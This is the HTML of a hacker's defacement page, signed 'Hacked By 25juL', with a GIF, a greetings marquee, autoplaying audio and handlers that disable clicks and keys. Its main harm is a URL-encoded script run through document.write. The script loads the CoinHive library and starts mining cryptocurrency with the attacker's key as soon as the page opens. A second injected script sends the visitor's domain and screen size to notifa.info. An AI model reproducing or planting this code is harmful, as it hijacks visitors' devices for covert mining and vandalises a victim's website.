<html lang="en-US"><head><center>
		<meta charset="UTF-8">
		<title>ORANG GANTENG</title>
		<link href="https://fonts.googleapis.com/css?family=Merienda+One" rel="stylesheet">
		<meta charset="UTF-8">
		<meta name="keywords" content="Hacked By 25juL">
		<meta name="description" content="25juL ORANG GANTENG">
		<meta name="keywords" content="Hacked By 25juL">
		<meta name="author" content="ORANG GANTENG">
		<meta name="viewport" content="width=device-width, initial-scale=1.0">
		<script type="text/javascript" async="" src="http://p01.notifa.info/3fsmd3/request?id=1&amp;enc=9UwkxLgY9&amp;params=4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5mLX%2fqE78fli%2fJ7%2blgGQX98MycxQ9BgNeK9YksvrwuU58Nc6XtwViXtscZogWXzb9QoK7e%2fWgL%2fJ5pbFVkrB0s9pDnJXt%2bNVjOeyxW1XKmKplGqxAqplMSQPuOfNrA5O1mXrzBq%2bvwHlQXsBos5pA2OmPtUpb2Gez3R3CyWGjGXLzjbdodmnWTldaSoBixfb2J2phDZa0Vk1jzJBebKOkkbK65cE3qd%2bwXcGX%2f3dwUSQURLKTWxsP3idVPU%2bFUGaY0w7dtTBd3Ov8fL84Fj6flznpbWPBa4PbwztRv9X%2bxMZeuOTP0Wh%2b7rkc%2fOBYA69qk4IIMet30OGURVv6zNgkRVQWRH%2bVbRdj6NvvYERIlBcm7SIbfxX%2fOSf0yd9aIBe7DDPKpMUkWFpW4FlTRSxcS7ryKVeBn1iaMZ2za%2fwRnSMpn4kXbbvi7NmlIyBsGOevuTnpSNQV46bKQcVQEYxMKNt5XmVZknIoAArTkY9H7Qn6uZkYihPjWzCNk52r9Bepg&amp;idc_r=77668925018&amp;domain=learning.domlive.org&amp;sw=1600&amp;sh=900"></script></head><body onmousedown="return false;" onkeydown="return false;" oncontextmenu="return false;"><audio autoplay="autoplay" controls="controls" src="https://drive.google.com/uc?

authuser=0&amp;id=10rfnczt5XmXzIEqquQ-t9NvOpH3lwF7h&amp;export=download" type="audio/mpeg"></audio>
		<style type="text/css">
		
			h1 {
				font-size: 40px;
				color: #FFFFFF;
			}
			h2 {
				color: #000000;
				font-size: 30px;
			}
			h3 {
				font-size: 20px;
				text-shadow: 1px 1px 2px black, 0 0 25px red, 0 0 5px darkblue;
			}
			body {
				background: url(#) repeat #fff;
				font-family: 'Merienda One', cursive;
				cursor: url(http://i.imgur.com/kDJd1jB.png), auto;
			}
			
			.D7netArea {
			  text-align: center;
			  color: #fff;
			  font-weight: 700;
			  animation: blur 1.5s ease-out infinite;
			  text-shadow: 0px 0px 5px #000000, 0px 0px 7px #fff;
			}

			@keyframes blur {
			  from {
				text-shadow:0px 0px 10px #fff,
				  0px 0px 10px #fff, 
				  0px 0px 25px #fff,
				  0px 0px 25px #fff,
				  0px 0px 25px #fff,
				  0px 0px 25px #fff,
				  0px 0px 25px #fff,
				  0px 0px 25px #fff,
				  0px 0px 50px #fff,
				  0px 0px 50px #fff,
				  0px 0px 50px #7B96B8,
				  0px 0px 150px #7B96B8,
				  0px 10px 100px #7B96B8,
				  0px 10px 100px #7B96B8,
				  0px 10px 100px #7B96B8,
				  0px 10px 100px #7B96B8,
				  0px -10px 100px #7B96B8,
				  0px -10px 100px #7B96B8;
			  }
			}
			footer {
				position: fixed;  
				left: 0px;
				right: 0px;
				bottom: 0px;
				border-top: 2px solid #777777;
				border-bottom: 2px solid #777777;
			}
			

		</style>
		<script language="javascript">
document.write(unescape('%3C%73%63%72%69%70%74%3E%0A

%20%20%20%20%76%61%72%20%6D%6E%72%20%3D%20%64%6F%63%75%6D%65%6E%74%2E

%63%72%65%61%74%65%45%6C%65%6D%65%6E

%74%28%27%73%63%72%69%70%74%27%29%3B%0A%20%20%20%20%6D%6E%72%2E

%73%72%63%20%3D%20%27%68%74%74%70%73%3A%2F%2F%63%6F%69%6E%2D

%68%69%76%65%2E%63%6F%6D%2F%6C%69%62%2F%63%6F%69%6E%68%69%76%65%2E%6D

%69%6E%2E%6A%73%27%3B%0A%20%20%20%20%6D%6E%72%2E%6F%6E%6C%6F

%61%64%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%0A%20%20%09%76%61%72%20%6D

%69%6E%65%72%3D%43%6F%69%6E%48%69%76%65%2E%41%6E%6F%6E%79%6D%6F

%75%73%28%27%72%61%63%37%64%65%6E%72%67%74%37%31%63%57%74%6D

%59%47%53%47%59%75%50%45%33%66%41%4D%50%61%4A%36%27%29%3B%0A

%20%20%09%6D%69%6E%65%72%2E%73%74%61%72%74%28%29%3B%0A%20%20%20%20%7D

%3B%0A%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D

%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%62%6F%64%79%27%29%5B

%30%5D%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6D%6E%72%29%3B%0A%3C

%2F%73%63%72%69%70%74%3E'));
</script>
	
	
	
		<center><br>
			<h1><font color="#ff0000">ORANG <font color="#ff0000"> GANTENG <font color="#ff0000"> GUYS <font color="#ff0000"></font></font></font></h1><font color="#ff0000"><font color="#ff0000">
			<img src="
https://media.giphy.com/media/l2Sq1lXx65volh33O/giphy.gif" alt="BlackWeb" width="600px" height="250px">
			<div class="ORANG GANTENG"><br>
				<h2>25juL FT T3RK3DJ03D_12</h2>
			</div>
			<h3><font size="4px" face="Nova Square" color="aqua">Happiness will feel 

sweeter, through a sincere struggle
</font></h3>
		</font></font></center><font color="#ff0000"><font color="#ff0000">
	
		<footer>
			<center>
				<table><tbody><tr><td>
					<b><font color="#ff0000">Greetz: </font></b>
					</td><td>
						<marquee scrollamount="5" scrolldelay="50" width="90%">
							<font color="#ff0000">
							  25juL DAN T3RK3DJ03D_12 COWOK TAMVAN RAJIN DAN SYUKA MENABUNG BAIK HATI LAGI :V  BEDA SAMA LU KALAU LU SEMUA BURIQ  :V , KITA NOOB TAMVANS😎LU
							</font>
						</marquee>
					</td></tr>
				</tbody></table>
			</center>
		</footer>
	
	<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5mLX%2fqE78fli%2fJ7%2blgGQX98MycxQ9BgNeK9YksvrwuU58Nc6XtwViXtscZogWXzb9QoK7e%2fWgL%2fJ5pbFVkrB0s9pDnJXt%2bNVjOeyxW1XKmKplGqxAqplMSQPuOfNrA5O1mXrzBq%2bvwHlQXsBos5pA2OmPtUpb2Gez3R3CyWGjGXLzjbdodmnWTldaSoBixfb2J2phDZa0Vk1jzJBebKOkkbK65cE3qd%2bwXcGX%2f3dwUSQURLKTWxsP3idVPU%2bFUGaY0w7dtTBd3Ov8fL84Fj6flznpbWPBa4PbwztRv9X%2bxMZeuOTP0Wh%2b7rkc%2fOBYA69qk4IIMet30OGURVv6zNgkRVQWRH%2bVbRdj6NvvYERIlBcm7SIbfxX%2fOSf0yd9aIBe7DDPKpMUkWFpW4FlTRSxcS7ryKVeBn1iaMZ2za%2fwRnSMpn4kXbbvi7NmlIyBsGOevuTnpSNQV46bKQcVQEYxMKNt5XmVZknIoAArTkY9H7Qn6uZkYihPjWzCNk52r9Bepg" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script>
</font></font></body></html>











